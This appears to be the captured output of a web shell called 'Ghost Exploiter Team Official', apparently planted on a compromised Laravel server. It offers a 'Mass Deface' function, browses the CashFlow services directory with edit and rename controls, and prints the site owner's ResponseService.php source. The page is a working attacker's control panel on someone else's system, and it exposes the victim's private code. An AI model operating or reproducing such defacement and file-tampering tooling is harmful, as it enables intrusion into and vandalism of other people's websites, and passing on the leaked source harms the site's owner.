Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Services
/
CashFlow
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ActiveTabDayService.php
70.037KB
edt
ren
ActiveTabMonthService-2
...
0KB
edt
ren
ActiveTabMonthService.php
74.889KB
edt
ren
ActiveTabProjectService
...
25.57KB
edt
ren
ActiveTabQuarterService
...
77.055KB
edt
ren
ResponseService.php
0.823KB
edt
ren
<?php declare(strict_types=1); namespace App\Services; use App\Responses\ResponseDto; use Illuminate\Http\JsonResponse; class ResponseService { public static function json($result = null, $status = 200): JsonResponse { try { return response()->json(self::wrap($result), $status); } catch (\Throwable $exception) { dd($exception); } } public static function array($result = null, bool $paginatable = false): array { try { return self::wrap($result, $paginatable)->toArray(); } catch (\Throwable $exception) { dd($exception); } } public static function wrap(array $result = null, ?bool $paginatable = false): ResponseDto { return ResponseDto::from([...$result, 'paginatable' => $paginatable]); } }